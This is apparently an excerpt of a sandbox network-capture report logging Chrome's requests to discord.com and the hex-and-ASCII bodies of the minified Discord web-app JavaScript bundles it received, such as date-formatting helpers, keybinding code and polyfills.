                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 2c 72 29 7b 69 66 28 65 2b 3d 22 22 2c 6e 3f 6e 2e 6c 65 6e 67 74 68 3e 31 26 26 28 6e 3d 6e 2e 63 68 61 72 41 74 28 30 29 29 3a 6e 3d 22 20 22 2c 22 72 69 67 68 74 22 3d 3d 28 72 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 22 6c 65 66 74 22 3a 22 72 69 67 68 74 22 29 29 66 6f 72 28 3b 65 2e 6c 65 6e 67 74 68 3c 74 3b 29 65 2b 3d 6e 3b 65 6c 73 65 20 66 6f 72 28 3b 65 2e 6c 65 6e 67 74 68 3c 74 3b 29 65 3d 6e 2b 65 3b 72 65 74 75 72 6e 20 65 7d 2c 6f 2e 74 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2f 31 65 33 7d 3b 76 61 72 20 61 3d 5b 30 2c 30 2c 33 31 2c 35 39 2c 39 30 2c 31 32 30 2c 31 35 31 2c 31 38 31 2c 32 31 32 2c 32 34 33 2c 32 37 33 2c 33 30 34 2c 33 33 34 5d 2c 69 3d 5b
                                                                          Data Ascii: ,r){if(e+="",n?n.length>1&&(n=n.charAt(0)):n=" ","right"==(r=void 0===r?"left":"right"))for(;e.length<t;)e+=n;else for(;e.length<t;)e=n+e;return e},o.time=function(){return new Date().getTime()/1e3};var a=[0,0,31,59,90,120,151,181,212,243,273,304,334],i=[
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 29 3b 72 65 74 75 72 6e 20 75 2e 59 28 29 2b 28 31 32 3d 3d 3d 65 26 26 74 3c 39 3f 2d 31 3a 31 3d 3d 3d 65 26 26 74 3e 39 29 7d 2c 59 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 7d 2c 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 75 2e 59 28 29 29 2e 73 6c 69 63 65 28 2d 32 29 7d 2c 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 2e 67 65 74 48 6f 75 72 73 28 29 3e 31 31 3f 22 70 6d 22 3a 22 61 6d 22 7d 2c 41 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 2e 61 28 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 2c 42 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 2e 67 65 74 54 69 6d 65 28 29 2f 31 65 33 2c 74 3d 65 25 38 36
                                                                          Data Ascii: );return u.Y()+(12===e&&t<9?-1:1===e&&t>9)},Y:function(){return n.getFullYear()},y:function(){return String(u.Y()).slice(-2)},a:function(){return n.getHours()>11?"pm":"am"},A:function(){return u.a().toUpperCase()},B:function(){var e=n.getTime()/1e3,t=e%86
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 7b 65 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 6f 2e 74 69 6d 65 28 29 3a 65 2c 74 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 22 59 2d 6d 2d 64 22 3a 74 3b 76 61 72 20 6e 3d 6e 65 77 20 44 61 74 65 2c 72 3d 6e 65 77 20 44 61 74 65 28 6e 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 2c 6e 2e 67 65 74 4d 6f 6e 74 68 28 29 2c 6e 2e 67 65 74 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 2f 31 65 33 3b 69 66 28 65 3c 72 26 26 65 3e 3d 72 2d 38 36 34 30 30 29 72 65 74 75 72 6e 22 79 65 73 74 65 72 64 61 79 22 3b 69 66 28 65 3e 3d 72 26 26 65 3c 72 2b 38 36 34 30 30 29 72 65 74 75 72 6e 22 74 6f 64 61 79 22 3b 69 66 28 65 3e 3d 72 2b 38 36 34 30 30 26 26 65 3c 72 2b 31 37 32 38 30 30 29 72 65 74 75 72 6e 22 74 6f 6d 6f 72 72 6f 77 22 3b 72 65 74 75 72 6e 20 6f 2e 64 61 74
                                                                          Data Ascii: {e=void 0===e?o.time():e,t=void 0===t?"Y-m-d":t;var n=new Date,r=new Date(n.getFullYear(),n.getMonth(),n.getDate()).getTime()/1e3;if(e<r&&e>=r-86400)return"yesterday";if(e>=r&&e<r+86400)return"today";if(e>=r+86400&&e<r+172800)return"tomorrow";return o.dat
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 72 73 65 49 6e 74 28 65 2c 31 30 29 29 3f 30 3a 65 29 3c 30 3f 22 2d 22 3a 22 22 2c 6e 3d 28 65 3d 4d 61 74 68 2e 61 62 73 28 65 29 29 25 31 30 30 3b 72 65 74 75 72 6e 20 74 2b 65 2b 28 6e 3e 34 26 26 6e 3c 32 31 3f 22 74 68 22 3a 28 7b 31 3a 22 73 74 22 2c 32 3a 22 6e 64 22 2c 33 3a 22 72 64 22 7d 29 5b 65 25 31 30 5d 7c 7c 22 74 68 22 29 7d 2c 6f 2e 66 69 6c 65 73 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 61 2c 69 29 7b 72 65 74 75 72 6e 28 74 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 31 30 32 34 3a 74 2c 65 3c 3d 30 29 3f 22 30 20 62 79 74 65 73 22 3a 28 65 3c 74 26 26 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 30 29 2c 76 6f 69 64 20 30 3d 3d 3d 69 26 26 28 69 3d 22 20 22 29 2c 6f 2e 69 6e 74 77 6f 72 64 28 65 2c 5b 22 62 79 74 65 73
                                                                          Data Ascii: rseInt(e,10))?0:e)<0?"-":"",n=(e=Math.abs(e))%100;return t+e+(n>4&&n<21?"th":({1:"st",2:"nd",3:"rd"})[e%10]||"th")},o.filesize=function(e,t,n,r,a,i){return(t=void 0===t?1024:t,e<=0)?"0 bytes":(e<t&&void 0===n&&(n=0),void 0===i&&(i=" "),o.intword(e,["bytes
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 5d 7d 29 29 29 2e 6e 61 6d 65 3d 22 49 6e 76 61 72 69 61 6e 74 20 56 69 6f 6c 61 74 69 6f 6e 22 7d 74 68 72 6f 77 20 6e 2e 66 72 61 6d 65 73 54 6f 50 6f 70 3d 31 2c 6e 7d 7d 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 69 6e 76 61 72 69 61 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 2c 6e 28 22 37 30 31 30 32 22 29 2c 6e 28 22 37 38 31 37 33 38 22 29 7d 2c 33 37 33 35 38 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 2c 6e 2c 72 29 7b 76 61 72 20 6f 3d 6e 3f 6e 2e 63 61 6c 6c 28 72 2c 65 2c 74 29 3a 76 6f 69 64 20 30 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 29 72 65 74 75 72 6e 21 21 6f 3b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 21 30
                                                                          Data Ascii: ]}))).name="Invariant Violation"}throw n.framesToPop=1,n}}n.r(t),n.d(t,{invariant:function(){return r}}),n("70102"),n("781738")},373589:function(e,t,n){"use strict";function r(e,t,n,r){var o=n?n.call(r,e,t):void 0;if(void 0!==o)return!!o;if(e===t)return!0
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 6f 72 74 73 2e 61 70 70 6c 79 3d 64 7d 2c 33 38 37 33 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 2c 74 2c 6e 3d 30 2c 72 3d 22 22 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 29 28 65 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 2b 2b 5d 29 26 26 28 74 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 3d 22 22 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 29 6f 2b 3d 74 3b 65 6c 73 65 20 69
                                                                          Data Ascii: orts.apply=d},38736:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return r}});var r=function(){for(var e,t,n=0,r="";n<arguments.length;)(e=arguments[n++])&&(t=function e(t){var n,r,o="";if("string"==typeof t||"number"==typeof t)o+=t;else i
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 65 78 70 6f 72 74 73 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 72 65 43 61 6c 6c 62 61 63 6b 3d 6e 28 22 36 37 30 30 33 39 22 29 2c 65 2e 65 78 70 6f 72 74 73 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 53 65 71 75 65 6e 63 65 3d 6e 28 22 36 30 34 31 36 32 22 29 2c 65 2e 65 78 70 6f 72 74 73 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 73 65 74 53 65 71 75 65 6e 63 65 54 69 6d 65 72 3d 6e 28 22 36 35 37 30 39 34 22 29 2c 65 2e 65 78 70 6f 72 74 73 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 74 61 63 68 3d 6e 28 22 33 31 36 39 30 30 22 29 2c 65 2e 65 78 70 6f 72 74 73 2e 69 6e 73 74 61 6e 63 65 73 3d 5b 5d 2c 65 2e 65 78 70 6f 72 74 73 2e 72 65 73 65 74 3d 6e 28 22 34 39 32 32 34 31 22 29 2c 65 2e 65 78 70 6f 72 74 73 2e 52 45 56 45 52 53 45 5f 4d 41 50 3d 6e 75 6c 6c
                                                                          Data Ascii: exports.prototype.fireCallback=n("670039"),e.exports.prototype.bindSequence=n("604162"),e.exports.prototype.resetSequenceTimer=n("657094"),e.exports.prototype.detach=n("316900"),e.exports.instances=[],e.exports.reset=n("492241"),e.exports.REVERSE_MAP=null
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 73 2b 2f 67 2c 22 20 22 29 29 2e 73 70 6c 69 74 28 22 20 22 29 3b 69 66 28 69 2e 6c 65 6e 67 74 68 3e 31 29 7b 74 68 69 73 2e 62 69 6e 64 53 65 71 75 65 6e 63 65 28 65 2c 69 2c 74 2c 6e 29 3b 72 65 74 75 72 6e 7d 61 3d 74 68 69 73 2e 67 65 74 4b 65 79 49 6e 66 6f 28 65 2c 6e 29 2c 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 73 5b 61 2e 6b 65 79 5d 3d 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 73 5b 61 2e 6b 65 79 5d 7c 7c 5b 5d 2c 74 68 69 73 2e 67 65 74 4d 61 74 63 68 65 73 28 61 2e 6b 65 79 2c 61 2e 6d 6f 64 69 66 69 65 72 73 2c 7b 74 79 70 65 3a 61 2e 61 63 74 69 6f 6e 7d 2c 72 2c 65 2c 6f 29 2c 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 73 5b 61 2e 6b 65 79 5d 5b 72 3f 22 75 6e 73 68 69 66 74 22 3a 22 70 75 73 68 22 5d 28 7b 63 61 6c 6c 62 61 63 6b 3a 74 2c 6d 6f
                                                                          Data Ascii: s+/g," ")).split(" ");if(i.length>1){this.bindSequence(e,i,t,n);return}a=this.getKeyInfo(e,n),this.callbacks[a.key]=this.callbacks[a.key]||[],this.getMatches(a.key,a.modifiers,{type:a.action},r,e,o),this.callbacks[a.key][r?"unshift":"push"]({callback:t,mo


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          244192.168.2.549978162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:10 UTC865OUTGET /assets/3341.1a1f8595a0c8fc9f99cf.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=DaO5EQhl_DZH5MV15WMVj.asDWNBImLONYMAHnieNNQ-1702226710025-0-604800000
                                                                          2023-12-10 16:45:10 UTC1121INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 34 37 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 64 35 61 31 63 30 39 64 32 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:10 GMTContent-Type: application/javascriptContent-Length: 8478Connection: closeCF-Ray: 8336f4ed5a1c09d2-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:10 UTC248INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 33 33 34 31 22 5d 2c 7b 38 34 35 36 35 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 72 28 22 31 32 35 33 35 39 22 29 2c 6f 3d 53 74 72 69 6e 67 2c 69 3d 54 79 70 65 45 72 72 6f 72 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 7c 7c 6e 28 74 29 29 72 65 74 75 72 6e 20 74 3b 74 68 72 6f 77 20 69 28 22 43 61 6e 27 74 20 73 65 74 20 22 2b 6f 28 74 29 2b 22 20 61 73 20 61 20 70
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["3341"],{845658:function(t,e,r){"use strict";var n=r("125359"),o=String,i=TypeError;t.exports=function(t){if("object"==typeof t||n(t))return t;throw i("Can't set "+o(t)+" as a p
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 72 6f 74 6f 74 79 70 65 22 29 7d 7d 2c 35 30 35 37 31 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 72 28 22 31 37 34 36 36 39 22 29 2c 6f 3d 72 28 22 31 34 38 30 36 36 22 29 2c 69 3d 72 28 22 35 34 31 33 36 38 22 29 2e 66 2c 63 3d 6e 28 22 75 6e 73 63 6f 70 61 62 6c 65 73 22 29 2c 75 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 3b 76 6f 69 64 20 30 3d 3d 3d 75 5b 63 5d 26 26 69 28 75 2c 63 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 6f 28 6e 75 6c 6c 29 7d 29 2c 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 75 5b 63 5d 5b 74 5d 3d 21 30 7d 7d 2c 31 30 39 30 32 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69
                                                                          Data Ascii: rototype")}},505713:function(t,e,r){"use strict";var n=r("174669"),o=r("148066"),i=r("541368").f,c=n("unscopables"),u=Array.prototype;void 0===u[c]&&i(u,c,{configurable:!0,value:o(null)}),t.exports=function(t){u[c][t]=!0}},109024:function(t,e,r){"use stri
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 65 6e 4c 69 73 74 3a 31 2c 44 61 74 61 54 72 61 6e 73 66 65 72 49 74 65 6d 4c 69 73 74 3a 30 2c 46 69 6c 65 4c 69 73 74 3a 30 2c 48 54 4d 4c 41 6c 6c 43 6f 6c 6c 65 63 74 69 6f 6e 3a 30 2c 48 54 4d 4c 43 6f 6c 6c 65 63 74 69 6f 6e 3a 30 2c 48 54 4d 4c 46 6f 72 6d 45 6c 65 6d 65 6e 74 3a 30 2c 48 54 4d 4c 53 65 6c 65 63 74 45 6c 65 6d 65 6e 74 3a 30 2c 4d 65 64 69 61 4c 69 73 74 3a 30 2c 4d 69 6d 65 54 79 70 65 41 72 72 61 79 3a 30 2c 4e 61 6d 65 64 4e 6f 64 65 4d 61 70 3a 30 2c 4e 6f 64 65 4c 69 73 74 3a 31 2c 50 61 69 6e 74 52 65 71 75 65 73 74 4c 69 73 74 3a 30 2c 50 6c 75 67 69 6e 3a 30 2c 50 6c 75 67 69 6e 41 72 72 61 79 3a 30 2c 53 56 47 4c 65 6e 67 74 68 4c 69 73 74 3a 30 2c 53 56 47 4e 75 6d 62 65 72 4c 69 73 74 3a 30 2c 53 56 47 50 61 74 68 53 65
                                                                          Data Ascii: enList:1,DataTransferItemList:0,FileList:0,HTMLAllCollection:0,HTMLCollection:0,HTMLFormElement:0,HTMLSelectElement:0,MediaList:0,MimeTypeArray:0,NamedNodeMap:0,NodeList:1,PaintRequestList:0,Plugin:0,PluginArray:0,SVGLengthList:0,SVGNumberList:0,SVGPathSe
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 29 2c 79 3d 72 28 22 34 38 34 37 38 34 22 29 2c 76 3d 72 28 22 31 37 34 36 36 39 22 29 2c 68 3d 72 28 22 33 38 31 32 35 30 22 29 2c 64 3d 72 28 22 34 36 38 32 36 31 22 29 2c 67 3d 63 2e 50 52 4f 50 45 52 2c 4f 3d 63 2e 43 4f 4e 46 49 47 55 52 41 42 4c 45 2c 62 3d 64 2e 49 74 65 72 61 74 6f 72 50 72 6f 74 6f 74 79 70 65 2c 78 3d 64 2e 42 55 47 47 59 5f 53 41 46 41 52 49 5f 49 54 45 52 41 54 4f 52 53 2c 6d 3d 76 28 22 69 74 65 72 61 74 6f 72 22 29 2c 4c 3d 22 6b 65 79 73 22 2c 53 3d 22 76 61 6c 75 65 73 22 2c 54 3d 22 65 6e 74 72 69 65 73 22 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 2c 63 2c 76 2c 64 2c 41 29 7b 73 28 72 2c 65 2c 63 29 3b 76 61 72
                                                                          Data Ascii: ),y=r("484784"),v=r("174669"),h=r("381250"),d=r("468261"),g=c.PROPER,O=c.CONFIGURABLE,b=d.IteratorPrototype,x=d.BUGGY_SAFARI_ITERATORS,m=v("iterator"),L="keys",S="values",T="entries",w=function(){return this};t.exports=function(t,e,r,c,v,d,A){s(r,e,c);var
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 7d 2c 33 38 31 32 35 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 7b 7d 7d 2c 31 34 38 30 36 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 2c 6f 3d 72 28 22 34 31 38 38 35 35 22 29 2c 69 3d 72 28 22 37 38 36 30 38 33 22 29 2c 63 3d 72 28 22 39 37 38 34 33 37 22 29 2c 75 3d 72 28 22 32 34 31 38 31 38 22 29 2c 73 3d 72 28 22 35 37 34 34 33 30 22 29 2c 61 3d 72 28 22 33 38 32 37 38 30 22 29 2c 66 3d 72 28 22 32 38 35 34 32 35 22 29 2c 70 3d 22 70 72 6f 74 6f 74 79 70 65 22 2c 6c 3d 22 73 63 72 69 70 74 22 2c 79 3d 66 28 22 49 45 5f 50 52 4f 54 4f 22 29 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 68 3d 66 75 6e 63 74
                                                                          Data Ascii: },381250:function(t,e,r){"use strict";t.exports={}},148066:function(t,e,r){"use strict";var n,o=r("418855"),i=r("786083"),c=r("978437"),u=r("241818"),s=r("574430"),a=r("382780"),f=r("285425"),p="prototype",l="script",y=f("IE_PROTO"),v=function(){},h=funct
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 74 6f 72 3b 72 65 74 75 72 6e 20 6f 28 72 29 26 26 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 3f 72 2e 70 72 6f 74 6f 74 79 70 65 3a 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 61 3f 66 3a 6e 75 6c 6c 7d 7d 2c 31 37 32 34 37 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 72 28 22 39 38 32 34 38 35 22 29 2c 6f 3d 72 28 22 39 37 38 34 33 37 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 28 74 2c 6f 29 7d 7d 2c 38 32 33 34 39 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 72 28 22 39 36 35 35 38 38 22 29 2c 6f 3d 72 28 22 34 31 38 38 35 35 22 29 2c
                                                                          Data Ascii: tor;return o(r)&&e instanceof r?r.prototype:e instanceof a?f:null}},172479:function(t,e,r){"use strict";var n=r("982485"),o=r("978437");t.exports=Object.keys||function(t){return n(t,o)}},823493:function(t,e,r){"use strict";var n=r("965588"),o=r("418855"),
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 72 28 22 38 35 39 35 31 34 22 29 2c 6f 3d 72 28 22 31 31 36 31 38 30 22 29 2c 69 3d 72 28 22 33 30 38 32 37 34 22 29 2c 63 3d 72 28 22 31 30 39 30 32 34 22 29 2c 75 3d 72 28 22 33 35 39 35 32 39 22 29 2c 73 3d 72 28 22 36 36 34 31 34 34 22 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 37 21 3d 3d 5b 5d 2e 70 75 73 68 2e 63 61 6c 6c 28 7b 6c 65 6e 67 74 68 3a 34 32 39 34 39 36 37 32 39 36 7d 2c 31 29 7d 29 3b 6e 28 7b 74 61 72 67 65 74 3a 22 41 72 72 61 79 22 2c 70 72 6f 74 6f 3a 21 30 2c 61 72 69 74 79 3a 31 2c 66 6f 72 63 65 64 3a 73 7c 7c 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 5b 5d 2c 22 6c 65 6e
                                                                          Data Ascii: strict";var n=r("859514"),o=r("116180"),i=r("308274"),c=r("109024"),u=r("359529"),s=r("664144")(function(){return 4294967297!==[].push.call({length:4294967296},1)});n({target:"Array",proto:!0,arity:1,forced:s||!function(){try{Object.defineProperty([],"len
                                                                          2023-12-10 16:45:10 UTC16INData Raw: 38 66 63 39 66 39 39 63 66 2e 6a 73 2e 6d 61 70
                                                                          Data Ascii: 8fc9f99cf.js.map


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          245192.168.2.549979162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:10 UTC866OUTGET /assets/64999.3c0486790babc24c66a4.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=DaO5EQhl_DZH5MV15WMVj.asDWNBImLONYMAHnieNNQ-1702226710025-0-604800000
                                                                          2023-12-10 16:45:10 UTC968INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 31 30 39 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 64 35 61 62 35 39 61 65 62 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:10 GMTContent-Type: application/javascriptContent-Length: 201090Connection: closeCF-Ray: 8336f4ed5ab59aeb-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
